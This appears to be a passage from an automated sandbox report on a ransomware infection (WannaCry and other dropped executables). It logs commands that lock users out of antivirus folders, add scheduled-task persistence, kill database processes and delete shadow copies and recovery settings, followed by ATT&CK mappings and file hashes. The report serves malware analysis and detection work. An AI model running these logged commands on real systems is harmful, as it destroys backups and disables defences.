  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:8844
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
    3⤵
    PID:8632
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:2212
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)
    3⤵
    PID:5512
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:648
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:3476
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:2916
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)
    3⤵
    PID:5848
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:2248
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
    3⤵
    PID:8836
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:1052
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:9132
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:8572
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:7440
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:6964
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:8260
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:6412
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4272
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:7484
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:1672
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:2788
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:7780
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:7576
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:5388
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:6860
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:8864
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:8276
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:6880
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:9188
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:6180
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:8948
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:7580
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:8796
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:8880
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:1860
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:3484
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:6920
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:9180
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:9164
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:2660
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:8764
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
    3⤵
    PID:8100
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:5932
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:8348
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:8076
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:6288
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
    3⤵
    PID:5052
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:2920
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:7260
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:5392
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
    3⤵
    PID:5904
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:8864
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:1080
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:7920
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:840
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:8044
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
    3⤵
    PID:8856
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:2876
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:2348
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:6184
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:5836
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:8640
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:9032
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:8260
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:4880
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:7184
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:6524
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:5528
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:8048
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:6160
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:8344
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:8152
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:2800
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:4996
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5520
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:1432
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:7660
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:8000
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
    3⤵
    PID:9208
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:6036
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:8724
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:6476
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
    3⤵
    PID:6912
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:8840
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:7788
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:2348
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
    3⤵
    - Creates scheduled task(s)
    PID:7412
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:4292
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3416
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=85 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5284 /prefetch:1
  2⤵
  PID:7428
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7316 /prefetch:8
  2⤵
  PID:6448
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7684 /prefetch:8
  2⤵
  PID:6300
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7284 /prefetch:8
  2⤵
  PID:3252
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7204 /prefetch:8
  2⤵
  PID:9044
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3420 /prefetch:8
  2⤵
  PID:6048
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2932 /prefetch:8
  2⤵
  PID:5380
- C:\Users\Admin\Downloads\WannaCry (2).exe
  "C:\Users\Admin\Downloads\WannaCry (2).exe"
  2⤵
  PID:4820
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 205441713457584.bat
    3⤵
    PID:5528
  - - C:\Windows\SysWOW64\cscript.exe
      cscript //nologo c.vbs
      4⤵
      PID:8716
- - C:\Users\Admin\Downloads\!WannaDecryptor!.exe
    !WannaDecryptor!.exe f
    3⤵
    PID:8224
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im MSExchange*
    3⤵
    - Kills process with taskkill
    PID:8364
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im Microsoft.Exchange.*
    3⤵
    - Kills process with taskkill
    PID:3880
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:6184
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im sqlserver.exe
    3⤵
    - Kills process with taskkill
    PID:1052
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im sqlwriter.exe
    3⤵
    - Kills process with taskkill
    PID:5828
- - C:\Users\Admin\Downloads\!WannaDecryptor!.exe
    !WannaDecryptor!.exe c
    3⤵
    PID:7156
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c start /b !WannaDecryptor!.exe v
    3⤵
    PID:5956
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5372
  - - C:\Users\Admin\Downloads\!WannaDecryptor!.exe
      !WannaDecryptor!.exe v
      4⤵
      PID:8676
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
        5⤵
        
        PID:6308
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic shadowcopy delete
        6⤵
        
        PID:8716
- - C:\Users\Admin\Downloads\!WannaDecryptor!.exe
    !WannaDecryptor!.exe
    3⤵
    PID:7332
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=93 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1948 /prefetch:1
  2⤵
  PID:1456
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7472 /prefetch:8
  2⤵
  PID:7052
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2608 /prefetch:8
  2⤵
  PID:5256

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3816

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4408

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004E0 0x00000000000004D0
1⤵
PID:5880

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6896
- C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
  "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
  2⤵
  PID:5940
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
    3⤵
    PID:8412

C:\ProgramData\Windows\rutserv.exe
C:\ProgramData\Windows\rutserv.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:6124
- C:\ProgramData\Windows\rfusclient.exe
  C:\ProgramData\Windows\rfusclient.exe
  2⤵
  - Executes dropped EXE
  PID:5876
- - C:\ProgramData\Windows\rfusclient.exe
    C:\ProgramData\Windows\rfusclient.exe /tray
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: SetClipboardViewer
    PID:7372
- C:\ProgramData\Windows\rfusclient.exe
  C:\ProgramData\Windows\rfusclient.exe /tray
  2⤵
  - Executes dropped EXE
  PID:5624

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:8320

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:7784

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
PID:4380

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:7796

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
PID:6632

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Scheduled Task/Job

T1053

Scripting

T1064

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Scripting

T1064

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Inhibit System Recovery

T1490

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Hdlharas\dlrarhsiva.exe

Filesize
9.1MB

MD5
64261d5f3b07671f15b7f10f2f78da3f

SHA1
d4f978177394024bb4d0e5b6b972a5f72f830181

SHA256
87f51b4632c5fbc351a59a234dfefef506d807f2c173aac23162b85d0d73c2ad

SHA512
3a9ff39e6bc7585b0b03f7327652e4c3b766563e8b183c25b6497e30956945add5684f1579862117e44c6bac2802601fc7c4d2a0daa1824f16c4da1fd6c9c91a

Download Submit
C:\ProgramData\Hdlharas\mdkhm.zip

Filesize
56KB

MD5
b635f6f767e485c7e17833411d567712

SHA1
5a9cbdca7794aae308c44edfa7a1ff5b155e4aa8

SHA256
6838286fb88e9e4e68882601a13fa770f1b510a0a86389b6a29070a129bf2e5e

SHA512
551ba05bd44e66685f359802b35a8c9775792a12844906b4b53e1a000d56624c6db323754331c9f399072790991c1b256d9114a50fb78111652a1c973d2880af

Download Submit
C:\ProgramData\Microsoft\Intel\taskhost.exe

Filesize
3.6MB

MD5
c5ec8996fc800325262f5d066f5d61c9

SHA1
95f8e486960d1ddbec88be92ef71cb03a3643291

SHA256
892e0afefca9c88d43bdd1beea0f09faadef618af0226e7cd1acdb47e871a0db

SHA512
4721692047759aea6cb6e5c6abf72602c356ab826326779e126cda329fa3f7e4c468bdb651bb664cc7638a23fca77bc2d006a3fe0794badc09d6643d738e885a

Download Submit
C:\ProgramData\Microsoft\Intel\winlogon.exe

Filesize
35KB

MD5
2f6a1bffbff81e7c69d8aa7392175a72

SHA1
94ac919d2a20aa16156b66ed1c266941696077da

SHA256
dc6d63798444d1f614d4a1ff8784ad63b557f4d937d90a3ad9973c51367079de

SHA512
ff09ef0e7a843b35d75487ad87d9a9d99fc943c0966a36583faa331eb0a243c352430577bc0662149a969dbcaa22e2b343bed1075b14451c4e9e0fe8fa911a37

Download Submit
C:\ProgramData\Windows\winit.exe

Filesize
961KB

MD5
03a781bb33a21a742be31deb053221f3

SHA1
3951c17d7cadfc4450c40b05adeeb9df8d4fb578

SHA256
e95fc3e7ed9ec61ba7214cc3fe5d869e2ee22abbeac3052501813bb2b6dde210

SHA512
010a599491a8819be6bd6e8ba3f2198d8f8d668b6f18edda4408a890a2769e251b3515d510926a1479cc1fa011b15eba660d97deccd6e1fb4f2d277a5d062d45

Download Submit
C:\ProgramData\svchost\vcredist2013_x64_000_vcRuntimeMinimum_x64.ico

Filesize
4KB

MD5
28d98fecf9351c6a31c9c37a738f7c15

SHA1
c449dee100d5219a28019537472edc6a42a87db2

SHA256
39445a090b7ce086d5efb4ac35add13672fac9bf40eb481b54fa87302a3f45e0

SHA512
f5c2458348347798304393fdb5c77f4f7ed7245c0d4c7594deb0113262828cb8e210e7b48a4aa7c4d2fe1e31201b4e326cd60a6f9d4e3ba1a7fbef322dde0971

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
f3f6e86c8b7bdc605f5559df800bfd34

SHA1
862d05bfba760ae8adcbb509216dc18ead59a6b2

SHA256
5dfe9be21d4916615025055f1a70151362bdb404b40f074685e39b33ad545a78

SHA512
de576ebf0cbe1c5e7639c42517253796cf4b5770298271ac2e6958404998f2d6b8e3378a535f2f316f4020fd8e60b5cc9c1b6b5171d307ca3215afe8ac47a7c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
f1a9c7fa806c60a3c2ed8a7829b1461f

SHA1
376cafc1b1b6b2a70cd56455124554c21b25c683

SHA256
1eb39b1409ce78188c133089bf3660393ac043b5baade7ff322df5a0ca95380b

SHA512
e1cb2f84b5cbd86b107c0a9ec0356ab65a54c91208f9f8e83fec64bf17ae89356a09b0cd39d2726424f4041d7b25b962c23672b8645c2e10f11ff4d2075f4afd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00002b

Filesize
2.8MB

MD5
cce284cab135d9c0a2a64a7caec09107

SHA1
e4b8f4b6cab18b9748f83e9fffd275ef5276199e

SHA256
18aab0e981eee9e4ef8e15d4b003b14b3a1b0bfb7233fade8ee4b6a22a5abbb9

SHA512
c45d021295871447ce60250ff9cbeba2b2a16a23371530da077d6235cfe5005f10fa228071542df3621462d913ad2f58236dc0c0cb390779eef86a10bba8429f

Download Submit
